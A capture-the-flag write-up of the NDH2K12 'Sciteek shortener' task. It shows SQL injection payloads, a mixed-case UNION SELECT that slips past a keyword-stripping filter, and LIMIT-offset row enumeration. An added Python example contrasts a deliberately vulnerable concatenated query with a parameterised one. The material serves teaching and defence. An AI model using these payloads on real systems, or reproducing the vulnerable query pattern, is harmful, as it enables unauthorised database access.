Laboratory NDH2K12 Prequals - Sciteek shortener

26 March 2012

The whole task is reduced to two points:

  1. Find SQL-injection
  2. Unleash, bypassing WAF

The first point was found by arekusux, who posted it in the conference:

sci.nuitduhack.com/sa' or '1' ='1


The most common syntax for this case, and the script redirects to Google (which is, accordingly, the first entry in the database).

Next, with any valid syntax using union or UNION, the script always returned an error, no matter how many columns were used.

As it turned out, it was simply cutting keywords written entirely in lowercase or entirely in uppercase (a simple WAF). As a result, the injection could be performed as follows:

http://sci.nuitduhack.com/sa' UnION SELeCT USER () -- - (the table has just one column)
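To show why a keyword-stripping filter is not a fix for this class of bug, here is an added example (not code from the writeup and not the Sciteek shortener's own code). It reconstructs the observed behaviour as a hypothetical `naive_waf` that removes `union`/`select` only when spelled in one case, a lookup built by string concatenation, and the hardened form that binds the slug as a parameter. The table contents are constructed; the `' or '1' ='1` payload is the one quoted above.

```python
import sqlite3

# Constructed sample rows for a toy URL shortener (not the real Sciteek data).
# The first row is deliberately the "Google" entry the writeup describes.
ROWS = [
    ("go", "http://www.google.com/"),
    ("sa", "http://example.invalid/sa"),
]


def make_db():
    """Create an in-memory SQLite database with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE links (slug TEXT, url TEXT)")
    conn.executemany("INSERT INTO links VALUES (?, ?)", ROWS)
    return conn


# Hypothetical reconstruction of the "simple WAF" seen in the task: it deletes
# the keywords only when written entirely in lowercase or entirely in uppercase,
# so mixed-case spellings pass through untouched.
KEYWORDS = ("union", "select")


def naive_waf(slug):
    for kw in KEYWORDS:
        slug = slug.replace(kw, "").replace(kw.upper(), "")
    return slug


def vulnerable_lookup(conn, slug):
    """Lookup as the writeup implies it worked: filter, then concatenate."""
    query = "SELECT url FROM links WHERE slug = '%s'" % naive_waf(slug)
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def safe_lookup(conn, slug):
    """Hardened form: the slug is bound as data and never parsed as SQL."""
    row = conn.execute(
        "SELECT url FROM links WHERE slug = ?", (slug,)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    payload = "sa' or '1' ='1"
    print("filter leaves mixed case alone:", naive_waf("UnION SELeCT"))
    print("vulnerable:", vulnerable_lookup(conn, payload))  # first row: Google
    print("safe:", safe_lookup(conn, payload))              # None, no such slug
```

The point of the comparison is that the filter is a blocklist over a token stream the database parses differently; the parameterised query removes the problem by never letting the slug reach the SQL parser at all.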

Iterating through the rows ...

http://sci.nuitduhack.com/sa' or 1=1 LIMIT 1,1 -- -

http://sci.nuitduhack.com/sa' or 1=1 LIMIT 2,1 -- -


http://sci.nuitduhack.com/sa' or 1 =1 LIMIT 7,1 -- -

And the seventh link leads to the key: http://sci.nuitduhack.com/mMVzJ8Qj/flag.txt